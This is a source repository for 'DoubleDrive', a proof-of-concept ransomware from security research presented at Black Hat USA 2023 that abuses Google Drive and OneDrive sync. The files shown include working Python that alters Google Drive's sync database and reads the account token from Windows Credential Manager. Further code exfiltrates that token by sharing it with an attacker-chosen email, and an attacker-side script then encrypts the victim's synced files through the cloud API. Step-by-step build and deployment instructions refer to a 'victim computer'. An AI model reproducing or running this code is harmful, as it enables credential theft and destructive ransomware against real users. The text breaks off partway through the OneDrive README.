├── .gitignore ├── LICENSE ├── README.md ├── google_drive_doubledrive ├── README.md ├── add_sync_dir.py ├── config.py ├── config_setup.py ├── endpoint_takeover.py ├── google_drive_doubledrive.py ├── google_drive_info.py ├── token_extraction.py └── victim_info_key.py ├── onedrive_doubledrive ├── README.md ├── config.py ├── config_setup.py ├── endpoint_takeover.py ├── follow_attacker_commands.py └── onedrive_doubledrive.py ├── requirements.txt ├── setup.py └── src └── doubledrive ├── __init__.py ├── cloud_drive ├── __init__.py ├── cloud_drive.py ├── google_drive │ ├── __init__.py │ ├── google_drive.py │ └── google_drive_item.py └── onedrive │ ├── __init__.py │ ├── onedrive.py │ └── onedrive_item.py ├── cloud_ransomware ├── __init__.py ├── cloud_drive_ransomware.py ├── google_drive_ransomware.py └── onedrive_ransomware.py └── endpoint_takeover_utils ├── __init__.py ├── endpoint_info ├── __init__.py └── onedrive │ ├── __init__.py │ └── onedrive_info.py ├── reparse_points ├── __init__.py ├── reparse_points.py └── reparse_structs.py ├── temp_email.py └── token_extraction ├── __init__.py └── onedrive ├── __init__.py ├── odl_parser ├── __init__.py ├── odl.py └── odl_LICENSE.md └── onedrive_token_extraction.py /.gitignore: -------------------------------------------------------------------------------- 1 | # Byte-compiled / optimized / DLL files 2 | __pycache__/ 3 | *.py[cod] 4 | *$py.class 5 | 6 | # C extensions 7 | *.so 8 | 9 | # Distribution / packaging 10 | .Python 11 | build/ 12 | develop-eggs/ 13 | dist/ 14 | downloads/ 15 | eggs/ 16 | .eggs/ 17 | lib/ 18 | lib64/ 19 | parts/ 20 | sdist/ 21 | var/ 22 | wheels/ 23 | pip-wheel-metadata/ 24 | share/python-wheels/ 25 | *.egg-info/ 26 | .installed.cfg 27 | *.egg 28 | MANIFEST 29 | 30 | # PyInstaller 31 | # Usually these files are written by a python script from a template 32 | # before PyInstaller builds the exe, so as to inject date/other infos into it. 33 | *.manifest 34 | *.spec 35 | 36 | # Installer logs 37 | pip-log.txt 38 | pip-delete-this-directory.txt 39 | 40 | # Unit test / coverage reports 41 | htmlcov/ 42 | .tox/ 43 | .nox/ 44 | .coverage 45 | .coverage.* 46 | .cache 47 | nosetests.xml 48 | coverage.xml 49 | *.cover 50 | *.py,cover 51 | .hypothesis/ 52 | .pytest_cache/ 53 | 54 | # Translations 55 | *.mo 56 | *.pot 57 | 58 | # Django stuff: 59 | *.log 60 | local_settings.py 61 | db.sqlite3 62 | db.sqlite3-journal 63 | 64 | # Flask stuff: 65 | instance/ 66 | .webassets-cache 67 | 68 | # Scrapy stuff: 69 | .scrapy 70 | 71 | # Sphinx documentation 72 | docs/_build/ 73 | 74 | # PyBuilder 75 | target/ 76 | 77 | # Jupyter Notebook 78 | .ipynb_checkpoints 79 | 80 | # IPython 81 | profile_default/ 82 | ipython_config.py 83 | 84 | # pyenv 85 | .python-version 86 | 87 | # pipenv 88 | # According to pypa/pipenv#598, it is recommended to include Pipfile.lock in version control. 89 | # However, in case of collaboration, if having platform-specific dependencies or dependencies 90 | # having no cross-platform support, pipenv may install dependencies that don't work, or not 91 | # install all needed dependencies. 92 | #Pipfile.lock 93 | 94 | # PEP 582; used by e.g. github.com/David-OConnor/pyflow 95 | __pypackages__/ 96 | 97 | # Celery stuff 98 | celerybeat-schedule 99 | celerybeat.pid 100 | 101 | # SageMath parsed files 102 | *.sage.py 103 | 104 | # Environments 105 | .env 106 | .venv 107 | env/ 108 | venv/ 109 | ENV/ 110 | env.bak/ 111 | venv.bak/ 112 | 113 | # Spyder project settings 114 | .spyderproject 115 | .spyproject 116 | 117 | # Rope project settings 118 | .ropeproject 119 | 120 | # mkdocs documentation 121 | /site 122 | 123 | # mypy 124 | .mypy_cache/ 125 | .dmypy.json 126 | dmypy.json 127 | 128 | # Pyre type checker 129 | .pyre/ 130 | 131 | # VSCODE 132 | .vscode/* 133 | 134 | # Local History for Visual Studio Code 135 | .history/ 136 | 137 | # Built Visual Studio Code Extensions 138 | *.vsix 139 | 140 | # OneDrive's DoubleDrive generated options 141 | onedrive_doubledrive/config.yaml -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | BSD 3-Clause License 2 | 3 | Copyright (c) 2022, SafeBreach Labs 4 | All rights reserved. 5 | 6 | Redistribution and use in source and binary forms, with or without 7 | modification, are permitted provided that the following conditions are met: 8 | 9 | 1. Redistributions of source code must retain the above copyright notice, this 10 | list of conditions and the following disclaimer. 11 | 12 | 2. Redistributions in binary form must reproduce the above copyright notice, 13 | this list of conditions and the following disclaimer in the documentation 14 | and/or other materials provided with the distribution. 15 | 16 | 3. Neither the name of the copyright holder nor the names of its 17 | contributors may be used to endorse or promote products derived from 18 | this software without specific prior written permission. 19 | 20 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" 21 | AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE 22 | IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE 23 | DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE 24 | FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL 25 | DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 26 | SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER 27 | CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, 28 | OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE 29 | OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # DoubleDrive 2 | A fully-undetectable ransomware that utilizes Cloud Drive Services to encrypt target files. Presented at Black Hat USA 2023 Briefing under the title - [**One Drive, Double Agent: Clouded OneDrive Turns Sides**](https://www.blackhat.com/us-23/briefings/schedule/index.html#one-drive-double-agent-clouded-onedrive-turns-sides-32695) 3 | 4 | ## DoubleDrive Python Package 5 | (Tested only on python version 3.11.4) 6 | 7 | Implements most of the logic and tools that a DoubleDrive variant needs. In order to create a DoubleDrive variant for a certain cloud storage service, the creator must create 2 different executables using this library's tools: 8 | * An endpoint takeover executable, implements: 9 | * Undetectable legitimate logic that syncs local target paths from the target computer to the cloud storage service using a built-in feature of the local cloud storage app 10 | * Exfiltration of the stolen authentication information so the target local paths become accessible from the cloud storage service API 11 | * A DoubleDrive ransomware executable, implements: 12 | * Collection of the exfiltrated authentication information that was sent by the endpoint takeover executable 13 | * Encryption of all target files by sending API requests to the cloud storage service 14 | 15 | 16 | ## Specific Cloud Storage Services Implementations of DoubleDrive: 17 | ### OneDrive 18 | Go into ./onedrive_doubledrive for the specific OneDrive variant. 19 | You can read how to use it here: [OneDrive DoubleDrive README](onedrive_doubledrive/README.md) 20 | 21 | ### Google Drive 22 | Go into ./google_drive_doubledrive for the specific Google Drive variant. 23 | You can read how to use it here: [Google Drive DoubleDrive README](google_drive_doubledrive/README.md) 24 | 25 | ## Author - Or Yair 26 | * LinkedIn - [Or Yair](https://www.linkedin.com/in/or-yair/) 27 | * Twitter - [@oryair1999](https://twitter.com/oryair1999) 28 | -------------------------------------------------------------------------------- /google_drive_doubledrive/README.md: -------------------------------------------------------------------------------- 1 | # Google Drive DoubleDrive 2 | A DoubleDrive variant that uses Google Drive to encrypt local files remotely. 3 | 4 | ## How to use 5 | 1. Make sure you clone the DoubleDrive repo and install the DoubleDrive python package. If you are currently in the google_drive_doubledrive folder then run: 6 | ```cmd 7 | pip install ../ 8 | ``` 9 | 2. Use `config_setup.py` to setup the exact configuration you want for the ransomware. For example: 10 | ```cmd 11 | python .\config_setup.py --temp-email --target-paths C:\Users\Admin\Documents C:\Users\Admin\Desktop 12 | ``` 13 | 3. While you are in the google_drive_doubledrive folder, run: 14 | ```cmd 15 | pyinstaller --onefile --add-data "config.yaml;." .\endpoint_takeover.py; pyinstaller --onefile --add-data "config.yaml;." .\google_drive_doubledrive.py 16 | ``` 17 | 4. A folder named `dist` will be created. Inside you can find `endpoint_takeover.exe` and `google_drive_doubledrive.exe` 18 | 5. Transfer `endpoint_takeover.exe` to the victim computer and run it. This will change Google Drive's settings database to sync the target paths to encrypt. It will also extract the token of the currently logged in Google Drive account and exfiltrate it by sharing it with the email address chosen in the configuration setup stage. 19 | > Note - If you chose a temporary email address you should continue to the next step as soon as possible because the generated temporary email address that DoubleDrive uses works for a limited amount of time. 20 | 1. On the attacker's computer, execute: 21 | ```cmd 22 | google_drive_doubledrive.exe 23 | ``` -------------------------------------------------------------------------------- /google_drive_doubledrive/add_sync_dir.py: -------------------------------------------------------------------------------- 1 | import subprocess 2 | import sqlite3 3 | import os 4 | import pathlib 5 | import win32con 6 | import win32file 7 | import win32api 8 | import psutil 9 | 10 | 11 | GOOGLE_DRIVE_DATA_PATH = os.path.expandvars(r"%localappdata%\Google\DriveFS") 12 | GOOGLE_DRIVE_ROOT_PREFERENCES_DB_PATH = os.path.join(GOOGLE_DRIVE_DATA_PATH, "root_preference_sqlite.db") 13 | GOOGLE_DRIVE_DB_MAX_IDS_TABLE = "max_ids" 14 | GOOGLE_DRIVE_DB_ROOTS_TABLE = "roots" 15 | GOOGLE_DRIVE_PROCESS_NAME = "GoogleDriveFS.exe" 16 | GOOGLE_DRIVE_LAUNCH_SCRIPT_PATH = os.path.expandvars(r"%ProgramFiles%\Google\Drive File Stream\launch.bat") 17 | SYNC_DELAY_AFTER_GOOGLE_DRIVE_RESTART = 3 18 | 19 | 20 | def restart_google_drive(): 21 | current_user = win32api.GetUserNameEx(win32con.NameSamCompatible) 22 | 23 | for proc in psutil.process_iter(): 24 | # Check if it's the Google Drive process of the current user 25 | # to kill only the current user's processes 26 | is_current_user = False 27 | try: 28 | proc_username = proc.username() 29 | is_current_user = current_user == proc_username 30 | except psutil.AccessDenied: 31 | pass 32 | 33 | if is_current_user and GOOGLE_DRIVE_PROCESS_NAME == proc.name(): 34 | proc.kill() 35 | 36 | process = subprocess.Popen(f"\"{GOOGLE_DRIVE_LAUNCH_SCRIPT_PATH}\"", stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL) 37 | process.wait() 38 | 39 | 40 | def add_google_drive_sync_dir(account_id: str, new_sync_dir_path: str): 41 | google_drive_db = sqlite3.connect(GOOGLE_DRIVE_ROOT_PREFERENCES_DB_PATH) 42 | 43 | dir_name = os.path.basename(new_sync_dir_path) 44 | 45 | max_ids_cursor = google_drive_db.execute(f"SELECT * from {GOOGLE_DRIVE_DB_MAX_IDS_TABLE}") 46 | record = max_ids_cursor.fetchone() 47 | 48 | if None != record: 49 | max_ids = record[1] 50 | new_max_ids = max_ids + 1 51 | google_drive_db.execute(f"UPDATE {GOOGLE_DRIVE_DB_MAX_IDS_TABLE} set value = {new_max_ids} where id_type = 'max_root_id'") 52 | 53 | os_drive = pathlib.Path.home().drive + "\\" 54 | new_sync_dir_path_without_os_drive = new_sync_dir_path.replace(os_drive, "") 55 | os_drive_guid_path = win32file.GetVolumeNameForVolumeMountPoint(os_drive) 56 | os_drive_uuid = os_drive_guid_path[os_drive_guid_path.find("{") + 1 : os_drive_guid_path.find("}")] 57 | google_drive_db.execute(f"INSERT INTO {GOOGLE_DRIVE_DB_ROOTS_TABLE} (media_id, title, root_path, account_token, sync_type, destination, medium, state, one_shot, is_my_drive, doc_id, last_seen_absolute_path) VALUES ('{os_drive_uuid}', '{dir_name}', '{new_sync_dir_path_without_os_drive}', '{account_id}', 1, 1, 1, 2, 0, 0, '', '{new_sync_dir_path}')") 58 | google_drive_db.commit() 59 | google_drive_db.close() 60 | 61 | -------------------------------------------------------------------------------- /google_drive_doubledrive/config.py: -------------------------------------------------------------------------------- 1 | import yaml 2 | import os 3 | import sys 4 | from enum import Enum 5 | 6 | class ConfigKey(Enum): 7 | CMD_FILE = 1 8 | IS_TEMP_EMAIL = 2 9 | TARGET_PATHS = 3 10 | SHOULD_SYNC_STARTUP_FOLDER = 4 11 | EXFILTRATION_EMAIL_ADDRESS = 5 12 | VICTIM_INFO_FILE_NAME = 6 13 | 14 | 15 | g_configs = None 16 | def get_configs(): 17 | global g_configs 18 | if None != g_configs: 19 | return g_configs 20 | 21 | bundle_dir = getattr(sys, '_MEIPASS', os.path.abspath(os.path.dirname(__file__))) 22 | path_to_config_file = os.path.abspath(os.path.join(bundle_dir, "config.yaml")) 23 | 24 | with open(path_to_config_file, "r") as f: 25 | configs = yaml.safe_load(f) 26 | g_configs = configs 27 | 28 | return g_configs -------------------------------------------------------------------------------- /google_drive_doubledrive/config_setup.py: -------------------------------------------------------------------------------- 1 | import os 2 | import argparse 3 | import uuid 4 | import yaml 5 | 6 | from doubledrive.endpoint_takeover_utils.temp_email import TempEmail 7 | from config import ConfigKey 8 | 9 | def parse_args(): 10 | parser = argparse.ArgumentParser(description="Options setup for Google Drive DoubleDrive") 11 | 12 | group = parser.add_mutually_exclusive_group(required=True) 13 | group.add_argument("--temp-email", help="If specified, sets DoubleDrive to exfiltrate the token over a temp email", action="store_true") 14 | group.add_argument("--custom-email", help="If specified, sets DoubleDrive to exfiltrate the token over the specified email", type=str) 15 | 16 | parser.add_argument("--sync-startup-folder", help="If specified, set DoubleDrive to sync the user's startup folder as well", action="store_true") 17 | parser.add_argument("--target-paths", nargs="+", help="The list of directory paths to encrypt using Google Drive", type=str, required=True) 18 | 19 | return parser.parse_args() 20 | 21 | 22 | def get_temp_email(): 23 | temp_email = TempEmail() 24 | return f"{temp_email.username}@{temp_email.domain}" 25 | 26 | 27 | def create_config_file_from_args(args): 28 | email_addr = None 29 | if args.temp_email: 30 | email_addr = get_temp_email() 31 | else: 32 | email_addr = args.custom_email 33 | 34 | 35 | config = { 36 | ConfigKey.EXFILTRATION_EMAIL_ADDRESS.value: email_addr, 37 | ConfigKey.IS_TEMP_EMAIL.value: args.temp_email, 38 | ConfigKey.VICTIM_INFO_FILE_NAME.value: str(uuid.uuid4()), 39 | ConfigKey.TARGET_PATHS.value: args.target_paths, 40 | ConfigKey.SHOULD_SYNC_STARTUP_FOLDER.value: args.sync_startup_folder, 41 | } 42 | 43 | if args.sync_startup_folder: 44 | config[ConfigKey.CMD_FILE.value] = str(uuid.uuid4()) 45 | 46 | with open('config.yaml', 'w') as f: 47 | yaml.dump(config, f) 48 | 49 | 50 | def main(): 51 | args = parse_args() 52 | create_config_file_from_args(args) 53 | 54 | 55 | if "__main__" == __name__: 56 | main() -------------------------------------------------------------------------------- /google_drive_doubledrive/endpoint_takeover.py: -------------------------------------------------------------------------------- 1 | import subprocess 2 | import sqlite3 3 | import os 4 | import pathlib 5 | import win32con 6 | import win32file 7 | import win32api 8 | import psutil 9 | import uuid 10 | import yaml 11 | import time 12 | import winreg 13 | 14 | from doubledrive.cloud_drive.google_drive.google_drive import GoogleDrive 15 | 16 | from victim_info_key import VictimInfoKey 17 | from token_extraction import extract_google_drive_account_token_by_id 18 | from google_drive_info import get_google_drive_info 19 | from config import get_configs, ConfigKey 20 | 21 | GOOGLE_DRIVE_DATA_PATH = os.path.expandvars(r"%localappdata%\Google\DriveFS") 22 | LOCAL_APP_DATA_PATH = os.path.expandvars(r"%localappdata%") 23 | GOOGLE_DRIVE_ROOT_PREFERENCES_DB_PATH = os.path.join(GOOGLE_DRIVE_DATA_PATH, "root_preference_sqlite.db") 24 | GOOGLE_DRIVE_DB_MAX_IDS_TABLE = "max_ids" 25 | GOOGLE_DRIVE_DB_ROOTS_TABLE = "roots" 26 | MIRROR_SQLITE_DB_FILE_NAME = "mirror_sqlite.db" 27 | MIRROR_METADATA_SQLITE_DB_FILE_NAME = "mirror_metadata_sqlite.db" 28 | 29 | GOOGLE_DRIVE_PROCESS_NAME = "GoogleDriveFS.exe" 30 | GOOGLE_DRIVE_LAUNCH_SCRIPT_PATH = os.path.expandvars(r"%ProgramFiles%\Google\Drive File Stream\launch.bat") 31 | SYNC_DELAY_AFTER_GOOGLE_DRIVE_RESTART = 5 32 | 33 | 34 | def disable_current_user_recycle_bin(): 35 | hkcu_key = winreg.ConnectRegistry(None, winreg.HKEY_CURRENT_USER) 36 | with winreg.OpenKey(hkcu_key, r"Software\Microsoft\Windows\CurrentVersion\Policies") as policy_key: 37 | with winreg.CreateKey(policy_key, "Explorer") as explorer_policy_key: 38 | winreg.SetValue(explorer_policy_key, "NoRecycleFiles", 1) 39 | 40 | 41 | def get_current_user_google_drive_pids(): 42 | current_user_google_drive_pids = [] 43 | current_user = win32api.GetUserNameEx(win32con.NameSamCompatible) 44 | 45 | for proc in psutil.process_iter(): 46 | # Check if it's the Google Drive process of the current user 47 | # to kill only the current user's processes 48 | is_current_user = False 49 | try: 50 | proc_username = proc.username() 51 | is_current_user = current_user == proc_username 52 | except psutil.AccessDenied: 53 | pass 54 | 55 | if is_current_user and GOOGLE_DRIVE_PROCESS_NAME == proc.name(): 56 | current_user_google_drive_pids.append(proc.pid) 57 | 58 | return current_user_google_drive_pids 59 | 60 | 61 | def launch_google_drive(): 62 | process = subprocess.Popen(f"\"{GOOGLE_DRIVE_LAUNCH_SCRIPT_PATH}\"", stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL) 63 | process.wait() 64 | 65 | 66 | def restart_google_drive(): 67 | for pid in get_current_user_google_drive_pids(): 68 | proc = psutil.Process(pid) 69 | proc.kill() 70 | 71 | launch_google_drive() 72 | 73 | 74 | def add_google_drive_sync_dir(account_id: str, new_sync_dir_path: str): 75 | google_drive_db = sqlite3.connect(GOOGLE_DRIVE_ROOT_PREFERENCES_DB_PATH) 76 | 77 | dir_name = os.path.basename(new_sync_dir_path) 78 | 79 | max_ids_cursor = google_drive_db.execute(f"SELECT * from {GOOGLE_DRIVE_DB_MAX_IDS_TABLE}") 80 | record = max_ids_cursor.fetchone() 81 | 82 | if None != record: 83 | max_ids = record[1] 84 | new_max_ids = max_ids + 1 85 | google_drive_db.execute(f"UPDATE {GOOGLE_DRIVE_DB_MAX_IDS_TABLE} set value = {new_max_ids} where id_type = 'max_root_id'") 86 | 87 | os_drive = pathlib.Path.home().drive + "\\" 88 | new_sync_dir_path_without_os_drive = new_sync_dir_path.replace(os_drive, "") 89 | os_drive_guid_path = win32file.GetVolumeNameForVolumeMountPoint(os_drive) 90 | os_drive_uuid = os_drive_guid_path[os_drive_guid_path.find("{") + 1 : os_drive_guid_path.find("}")] 91 | google_drive_db.execute(f"INSERT INTO {GOOGLE_DRIVE_DB_ROOTS_TABLE} (media_id, title, root_path, account_token, sync_type, destination, medium, state, one_shot, is_my_drive, doc_id, last_seen_absolute_path) VALUES ('{os_drive_uuid}', '{dir_name}', '{new_sync_dir_path_without_os_drive}', '{account_id}', 1, 1, 1, 2, 0, 0, '', '{new_sync_dir_path}')") 92 | google_drive_db.commit() 93 | google_drive_db.close() 94 | 95 | 96 | def get_paths_inodes(paths: list[str]): 97 | inodes_to_paths = {} 98 | for dir_path in paths: 99 | # Google call it inode in there DBs but it is actually something called "file id" in Windows 100 | # It can be retrieved using the same way of getting the inode number on Linux computers 101 | windows_file_id = str(os.stat(dir_path).st_ino) 102 | inodes_to_paths[windows_file_id] = dir_path 103 | 104 | return inodes_to_paths 105 | 106 | 107 | def get_stable_ids_by_inodes(inodes: list[str]): 108 | account_id = get_google_drive_info().all_accounts_preferences[0].id 109 | mirror_sqlite_db_path = os.path.join(GOOGLE_DRIVE_DATA_PATH, account_id, MIRROR_SQLITE_DB_FILE_NAME) 110 | mirror_db = sqlite3.connect(mirror_sqlite_db_path) 111 | 112 | sql_where_target_inodes_expression = "where inode = " + " or inode = ".join(inodes) 113 | target_inodes_stable_ids_cursor = mirror_db.execute(f"SELECT stable_id, inode from mirror_item {sql_where_target_inodes_expression}") 114 | 115 | stable_ids_to_inodes = {} 116 | for row in target_inodes_stable_ids_cursor.fetchall(): 117 | stable_ids_to_inodes[str(row[0])] = str(row[1]) 118 | 119 | if len(stable_ids_to_inodes) != len(inodes): 120 | raise LookupError("Couldn't find all or some of the inodes in GoogleDrive's DB") 121 | 122 | return stable_ids_to_inodes 123 | 124 | 125 | def get_cloud_item_id_by_stable_id(stable_ids: list[str]): 126 | account_id = get_google_drive_info().all_accounts_preferences[0].id 127 | mirror_metadata_sqlite_db_path = os.path.join(GOOGLE_DRIVE_DATA_PATH, account_id, MIRROR_METADATA_SQLITE_DB_FILE_NAME) 128 | mirror_metadata_db = sqlite3.connect(mirror_metadata_sqlite_db_path) 129 | 130 | sql_where_target_stable_ids_expression = "where stable_id = " + " or stable_id = ".join(stable_ids) 131 | target_inodes_stable_ids_cursor = mirror_metadata_db.execute(f"SELECT stable_id, id from items {sql_where_target_stable_ids_expression}") 132 | 133 | cloud_item_id_to_stable_ids = {} 134 | for row in target_inodes_stable_ids_cursor.fetchall(): 135 | if str(row[1]).startswith("local"): 136 | raise LookupError("Google Drive has not updated the ID of one or more of the given stable IDS yet") 137 | cloud_item_id_to_stable_ids[str(row[1])] = str(row[0]) 138 | 139 | if len(cloud_item_id_to_stable_ids) != len(stable_ids): 140 | raise LookupError("Couldn't find all or some of the stable_ids in GoogleDrive's DB") 141 | 142 | return cloud_item_id_to_stable_ids 143 | 144 | 145 | def get_sync_paths_google_drive_ids(sync_paths: list[str]): 146 | inodes_to_target_paths = get_paths_inodes(sync_paths) 147 | stable_ids_to_inodes = get_stable_ids_by_inodes(inodes_to_target_paths.keys()) 148 | google_drive_ids_to_stable_ids = get_cloud_item_id_by_stable_id(stable_ids_to_inodes.keys()) 149 | google_drive_ids_to_target_paths = {} 150 | for google_drive_item_id, stable_id in google_drive_ids_to_stable_ids.items(): 151 | inode = stable_ids_to_inodes[stable_id] 152 | target_path = inodes_to_target_paths[inode] 153 | google_drive_ids_to_target_paths[google_drive_item_id] = target_path 154 | 155 | return google_drive_ids_to_target_paths 156 | 157 | 158 | def main(): 159 | # disable_current_user_recycle_bin() 160 | configs = get_configs() 161 | google_drive_info = get_google_drive_info() 162 | 163 | # Add each target path so sync with Google Drive 164 | for target_dir_path in configs[ConfigKey.TARGET_PATHS.value]: 165 | add_google_drive_sync_dir(google_drive_info.all_accounts_preferences[0].id, target_dir_path) 166 | 167 | # restart GoogleDriveFS.exe to trigger the sync to happen 168 | restart_google_drive() 169 | 170 | google_drive_ids_to_target_paths = None 171 | while None == google_drive_ids_to_target_paths: 172 | time.sleep(SYNC_DELAY_AFTER_GOOGLE_DRIVE_RESTART) 173 | try: 174 | google_drive_ids_to_target_paths = get_sync_paths_google_drive_ids(configs[ConfigKey.TARGET_PATHS.value]) 175 | except LookupError: 176 | # Sometimes Google Drive fails to start after restart 177 | # If Google Drive is not running: 178 | if 0 == len(get_current_user_google_drive_pids()): 179 | launch_google_drive() 180 | continue 181 | else: 182 | break 183 | 184 | account_token = extract_google_drive_account_token_by_id(google_drive_info.all_accounts_preferences[0].id) 185 | 186 | victim_info = { 187 | VictimInfoKey.COMPUTER_ITEM_ID.value: google_drive_info.all_accounts_preferences[0].machine_root_doc_id, 188 | VictimInfoKey.TOKEN.value: account_token, 189 | VictimInfoKey.IDS_TO_TARGET_PATHS.value: google_drive_ids_to_target_paths 190 | } 191 | 192 | google_drive_session = GoogleDrive() 193 | google_drive_session.login_using_token(account_token) 194 | 195 | victim_info_file_name = str(uuid.uuid4()) 196 | victim_info_file = google_drive_session.create_file(f"/{victim_info_file_name}", yaml.dump(victim_info)) 197 | victim_info_file = google_drive_session.trash_item(victim_info_file) 198 | google_drive_session.make_item_public(victim_info_file) 199 | google_drive_session.send_item_to_email(victim_info_file, configs[ConfigKey.EXFILTRATION_EMAIL_ADDRESS.value]) 200 | 201 | 202 | if "__main__" == __name__: 203 | main() -------------------------------------------------------------------------------- /google_drive_doubledrive/google_drive_doubledrive.py: -------------------------------------------------------------------------------- 1 | import yaml 2 | import requests 3 | 4 | from doubledrive.endpoint_takeover_utils.temp_email import TempEmail 5 | from doubledrive.cloud_drive.google_drive.google_drive import GoogleDrive 6 | from doubledrive.cloud_drive.google_drive.google_drive_item import GoogleDriveFileItem 7 | from doubledrive.cloud_ransomware.google_drive_ransomware import GoogleDriveRansomware 8 | from config import get_configs, ConfigKey 9 | from victim_info_key import VictimInfoKey 10 | 11 | EMAIL_SHARE_LINK_BEGINING = "https://drive.google.com/file/d/" 12 | 13 | def get_victim_info_file_id_from_email(email: str) -> str: 14 | temp_email = TempEmail(email) 15 | messages = temp_email.get_messages() 16 | last_message = messages[0] 17 | file_link_index = last_message.content.find(EMAIL_SHARE_LINK_BEGINING) 18 | file_id_index = file_link_index + len(EMAIL_SHARE_LINK_BEGINING) 19 | slash_after_file_id_index = last_message.content[file_id_index:].find("/") + file_id_index 20 | file_id = last_message.content[file_id_index:slash_after_file_id_index] 21 | 22 | return file_id 23 | 24 | 25 | def read_public_google_drive_text_file_by_id(file_id: str) -> bytes: 26 | res = requests.get(f"https://drive.google.com/uc?id={file_id}&export=download") 27 | res.raise_for_status() 28 | return res.content 29 | 30 | 31 | def get_ransomware_targets(google_drive_session: GoogleDrive, victim_info: dict): 32 | target_file_items = [] 33 | google_drive_ids_to_target_paths = victim_info[VictimInfoKey.IDS_TO_TARGET_PATHS.value] 34 | 35 | for google_drive_folder_id in google_drive_ids_to_target_paths.keys(): 36 | google_drive_folder_item = google_drive_session.get_item_by_id(google_drive_folder_id) 37 | for item in google_drive_session.list_children_recursively(google_drive_folder_item): 38 | if isinstance(item, GoogleDriveFileItem): 39 | target_file_items.append(item) 40 | 41 | return target_file_items 42 | 43 | 44 | def main(): 45 | configs = get_configs() 46 | 47 | victim_info_file_id = get_victim_info_file_id_from_email(configs[ConfigKey.EXFILTRATION_EMAIL_ADDRESS.value]) 48 | victim_info_file_content = read_public_google_drive_text_file_by_id(victim_info_file_id) 49 | victim_info = yaml.safe_load(victim_info_file_content) 50 | 51 | google_drive = GoogleDrive() 52 | google_drive.login_using_token(victim_info[VictimInfoKey.TOKEN.value]) 53 | 54 | target_file_items = get_ransomware_targets(google_drive, victim_info) 55 | cloud_ransomware = GoogleDriveRansomware(google_drive, "./key.key") 56 | cloud_ransomware.start_ransomware(target_file_items) 57 | 58 | 59 | if "__main__" == __name__: 60 | main() -------------------------------------------------------------------------------- /google_drive_doubledrive/google_drive_info.py: -------------------------------------------------------------------------------- 1 | import json 2 | import winreg 3 | from dataclasses import dataclass 4 | 5 | 6 | @dataclass 7 | class GoogleDrivePerAccountPreferences: 8 | id: str 9 | machine_root_doc_id: str 10 | mount_point_path: str 11 | 12 | 13 | class GoogleDriveInfo: 14 | def __init__(self) -> None: 15 | self.all_accounts_preferences: list[GoogleDrivePerAccountPreferences] = [] 16 | 17 | hkcu_key = winreg.ConnectRegistry(None, winreg.HKEY_CURRENT_USER) 18 | with winreg.OpenKey(hkcu_key, "Software\\Google\\DriveFS") as onedrive_personal_reg_key: 19 | all_accounts_preferences_string = winreg.QueryValueEx(onedrive_personal_reg_key, "PerAccountPreferences")[0] 20 | json_all_accounts_preferences = json.loads(all_accounts_preferences_string)["per_account_preferences"] 21 | 22 | for json_account_preferences in json_all_accounts_preferences: 23 | account_preferences = GoogleDrivePerAccountPreferences(json_account_preferences["key"], json_account_preferences["value"].get("machine_root_doc_id", None), json_account_preferences["value"].get("mount_point_path", None)) 24 | self.all_accounts_preferences.append(account_preferences) 25 | 26 | 27 | g_google_drive_info_single_instance = None 28 | def get_google_drive_info(): 29 | global g_google_drive_info_single_instance 30 | if None == g_google_drive_info_single_instance: 31 | g_google_drive_info_single_instance = GoogleDriveInfo() 32 | return g_google_drive_info_single_instance 33 | -------------------------------------------------------------------------------- /google_drive_doubledrive/token_extraction.py: -------------------------------------------------------------------------------- 1 | import win32cred 2 | 3 | 4 | CRED_TYPE_GENERIC = 1 5 | GOOGLE_DRIVE_TOKEN_START_BYTES = b"ya29" 6 | TOKEN_LEN_MULTIPLIERS_DISTANCE_FROM_TOKEN = -2 7 | GOOGLE_DRIVE_CRED_NAME_PREFIX = "DriveFS_" 8 | 9 | 10 | def extract_google_drive_account_token_by_id(account_id: str): 11 | cred_blob = win32cred.CredRead(f"{GOOGLE_DRIVE_CRED_NAME_PREFIX}{account_id}", CRED_TYPE_GENERIC)["CredentialBlob"] 12 | token_start_index = cred_blob.find(GOOGLE_DRIVE_TOKEN_START_BYTES) 13 | token_len_multipliers_index = token_start_index + TOKEN_LEN_MULTIPLIERS_DISTANCE_FROM_TOKEN 14 | token_len_byte1 = cred_blob[token_len_multipliers_index : token_len_multipliers_index+1] 15 | token_len_byte2 = cred_blob[token_len_multipliers_index+1 : token_len_multipliers_index+2] 16 | token_len_multiplier1 = int.from_bytes(token_len_byte1, byteorder="little") 17 | token_len_multiplier2 = int.from_bytes(token_len_byte2, byteorder="little") 18 | token_len = token_len_multiplier1 * token_len_multiplier2 19 | token = cred_blob[token_start_index : token_start_index+token_len].decode() 20 | return f"Bearer {token}" 21 | -------------------------------------------------------------------------------- /google_drive_doubledrive/victim_info_key.py: -------------------------------------------------------------------------------- 1 | from enum import Enum 2 | 3 | class VictimInfoKey(Enum): 4 | COMPUTER_ITEM_ID = 1 5 | TOKEN = 2 6 | IDS_TO_TARGET_PATHS = 3 7 | -------------------------------------------------------------------------------- /onedrive_doubledrive/README.md: -------------------------------------------------------------------------------- 1 | # OneDrive DoubleDrive 2 | A DoubleDrive variant that uses OneDrive to encrypt local files remotely. 3 | 4 | ## How to use 5 | 1. Make sure you clone the DoubleDrive repo and install the DoubleDrive python package. If you are currently in the onedrive_doubledrive folder then run: 6 | ```cmd 7 | pip install ../ 8 